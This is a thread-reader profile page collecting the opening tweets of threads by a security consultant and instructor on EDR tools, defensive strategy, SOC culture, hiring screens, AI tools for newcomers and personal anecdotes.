Mick Douglas 🇺🇦🌻 Profile picture
Consultant for InfoSec Innovations | @SANSInstitute Principal Instructor | @IANS_Security Faculty | I like information security. How about you?
Hecate's Crossroad #QVArmy Profile picture Anson Kennedy Profile picture Luke Morey Profile picture Sam Dornan Profile picture NAFO5IX(@)nafo.uk Profile picture 6 subscribed
Jul 28 20 tweets 4 min read
Buckle up... we need to chat about EDR, MDR, and XDR.

(IDK if I've kicked off a thread about this stuff... though I've participated in plenty.)

Here we go!!

1 EDR = Endpoint Detection & Response.

It is NOT a replacement for anti-virus. It is NOT a replacement for SIEM. In fact, many EDR products do better working with both!

Jun 21 13 tweets 3 min read
You *can* win at defense in cyber security.

Many orgs tell you that if an attacker lands on a system, or takes over a single account, that you've "failed"

That's simply not true.

If you believe you have to be perfect to win, buckle up... this is the thread for you!

1 First, let's talk about attacker goals. They're stealing accounts or getting on systems to do something. The goal is to act upon your data in some way. (destroy, alter, etc.)

This is an *important* distinction that many gloss over.

Jun 19 4 tweets 1 min read
I've shared with folks that I grew up poor.

I will forever be confused by the mental gymnastics richer folks go through to convince themselves they're not rich.

Story time:
1 This past weekend my Mrs and I were looking to buy a used sailboat. Here's the exchange

Me: it's an expensive hobby
Them: yeah, but compared to others it's quite reasonable!
Mrs: Like what?
T: IDK... owning an airplane?

Feb 23 14 tweets 3 min read
Story time:
Once I had a client (CISO) that was hyper insistent that I do "a no holds barred" attack against the C-Suite.

Despite mine and client's legal team's stream of suggestions to NOT do this, CISO was firm. It must be done to show a lesson.

Spoiler: plot twist soon!

1 Legal & HR came to me and said CISO is going to do this. There were other vendors who are pitching this, and I was the most firmly opposed. So they trusted me to not be evil.

Could I do the gig, but not in the way the CISO was expecting?

Feb 23 12 tweets 2 min read
Someone DMed me asking what this was about.

This is a stream of consciousness musing based on a part of a convo I had earlier today.

Let's dig in on what this is and why it's important... assuming NO technical know how.

1 Attackers use scripts and tools to find weaknesses in web sites & APIs. They pretty much have to because doing things by hand is slow, error prone, and "please kill me now" boring.

The technique I suggest *breaks* attacker automation, and does it in a way that's just... mean.
Jan 31 7 tweets 1 min read
HOLY CRAP. Infosec teams: do you eat your dogfood?

I did this morning. I did NOT like it.

This was eye opening.

1 Late yesterday

Client: mobile device reset is unbelievably burdensome for the users.
me: Let me look into it. I don't see how it would be that big a deal.

ominous music swells

Jan 29 5 tweets 1 min read
Build/config for my NixOS is nearing completion.

Here's some stuff I'm doing... unix/linux folks... what should I add to this?

1 Virtualization stuff:

(I use qemu-utils to convert VMs to qcow2 and am pretty much good to go)

Jan 28 11 tweets 2 min read
An open letter to MSFT Graph API and cmdlet folks.
(please RT for reach)

Most of us who are playing with your Graph API and related PowerShell cmdlets are OK with improvising and figuring things out.

But... you're increasingly making things harder than need be.

1 It seems like the docs you write are targeting the wrong crowd.

We *need* examples.

What you're giving is pages and pages of trivia that *might* be helpful as a reference. maybe.

Jan 4 8 tweets 2 min read
Getting DMs saying I'm wrong on this. Look, score != your role.

If you score well in a tech screen, you pass. If you score poorly you fail. Great scores do not get a more senior offering. If you score perfectly you don't get CTO or whatever.

It doesn't work that way. At all!
1 There is a discretionary zone where you might not be as strong technically as the org is looking to hire, but if you show good "intangibles" you can be hired... yes... even over a more technical person.

Jan 3 14 tweets 2 min read
Got a lot of DMs about a tech screening thread.

Number one issue: a good % of folks don't actually know what a tech screening is. So let's dig in!

1 Yes, a tech screen is to see what the technical competency is of a candidate... but it's more than just that.

If it only were a "can they XYZ?" you'd likely be sent to an online test.

Jan 2 7 tweets 2 min read
Just had my 2nd call today with the client about this.

They asked me to state a few things:
Calling this candidate a "techbro" and "an ass" was out of line. In hindsight, that's more than fair. I shouldn't have put this out so publicly.

1 Client also shared the candidate was told they would get the notes immediately after the call. There was confusion on candidate's part re: "read me your notes".

After review, client found notes to be helpful and insightful.

Jan 2 11 tweets 3 min read
I just hard flunked someone on a tech screening interview.

them: OK let's get this over with, I'm a big deal in this sector of the biz. I know this stuff.
me: um, we're screening tech, but I want to let you know I'll report tone and stuff too

1 Them: why? you're a tech screener, screen for that
me: Then why does my client include a "likability" column in the rating sheet?
T: don't care. I don't need to work with people.
M: huh?
T: I'm a 10x engineer. I don't ever talk with folks

Dec 12, 2022 6 tweets 2 min read
Just got off a phone call with someone.

A regulator ripped up an architecture… And I’m furious.

Before you go any further. This is for a high performance (very very very high volume) site _which will NEVER EVER have proprietary data. EVER.

Let’s look at the complaints…

1 “TLS must be to the destination web server/service”

We designed TLS to terminate at the load balancer. And HTTP to the worker.

Look, I understand MitM attacks. I’ve written tools to do it! But if your threat is an attacker can be between the LB and the WS? Da hell?

Dec 9, 2022 5 tweets 2 min read
Someone DM’ed me and asked “what do you mean Really Big Monitors?”

All SOCs are required to have absurdly large monitors on the walls. They are required to have pew pew visualizations on them at almost all times, but especially when clients or execs come visit the SOC
1 Now I know what you’re wondering… but do the analysts use these monitors? LOL! No. Never. (Maybe in the wee hours they’ll play a movie)

So why have these big monitors? It’s so your SOC is being shown as srrrsly SOCing so goodly. If you don’t have RBM, do you even SOC?
Dec 8, 2022 10 tweets 2 min read
Those just joining infosec or who are early on in your career.

This may shock you, but raw technical skill will be one of the least important skill sets for you.

It's important to develop tech skills, but...
1 In team based orgs (literally every single org), soft skills actually far matter more.

- can you communicate well (both written and verbal)?
- are you nice to work with?
- can you teach yourself?
- can you speak hard truths in a respectful ways?
Dec 6, 2022 15 tweets 6 min read
New to Information Security? Not in the industry yet, but want to be?

What will the current crop of AI tools mean for you, a cyber security rookie?

Here’s some of my thoughts… (long thread)

1 Image That block of text in the first tweet is potent… (I’ve actually saved it and plan on re-reading it periodically)

One thing that rookies need to be KEENLY aware of… There’s going to be an *explosion* of reasonable sounding but flat out wrong advice

2 Image
Oct 31, 2022 13 tweets 2 min read
This will hurt a lot of feelings so buckle up.

Cyber security is exactly as difficult as your org makes it.

If you have burdensome process, if your machines are overloaded with agents, if you have alert fatigue, etc.

You have a culture problem, not a tech problem.

1 No tech will ever be able to fix that.

Orgs grab for tech because they wrongly think it's the solution to security issues. They hopefully help, but they ALWAYS create new issues.

Oct 30, 2022 20 tweets 4 min read
long (slightly emo) rambling thread.

TL;DR: there's no crisp line between supporting and enabling someone. It's a fuzzy zone.

Sigh... today I may have "lost" an old friend to untreated mental illness. They're still alive but - for now - dead to me.

1 "Joe" is a brilliant fashion designer. Met him thru work when I was a sys admin for a top fashion brand.

His hilarious wit and insane ability to cut and drape fabric so it always flattered (regardless of body type) and mix textures... top notch.

Sep 22, 2022 6 tweets 1 min read
Look folks, MITRE's ATT&CK Matrix is great... but did you know there are firms (and attackers) who do stuff that's not on the matrix?

1 Also, if you really do have 100% coverage, that's great... but please understand that within each technique there's nearly an infinity of options on how to obfuscate or hide.

Sep 14, 2022 12 tweets 3 min read
cyber security isn't important... and that's OK.

This isn't a bleak rant... more a sharing of something I've known for a while... and am now accepting.

If you want your assumptions of cyber security challenged, please read on! 🧵

1 1st, the problem:

In 2015 Harvard Business Review dropped this:

"stock prices during and following the high profile security data breaches... have decreased slightly or quickly recovered following the breach"

Meaning, breaches don't really hurt orgs.

May 23, 2022 15 tweets 3 min read
If defense is hard, you're doing it wrongly.

Last week I wrapped up an interesting coaching type engagement for a defense crew.

I'm not ever going to violate NDAs, but I can share with you some interesting themes.

Let's dig in!
1 Do you have command line logging? some sort of process monitoring? (most EDRs do!)

Get away from the defaults and just look for odd programs being run. Here's some great resources...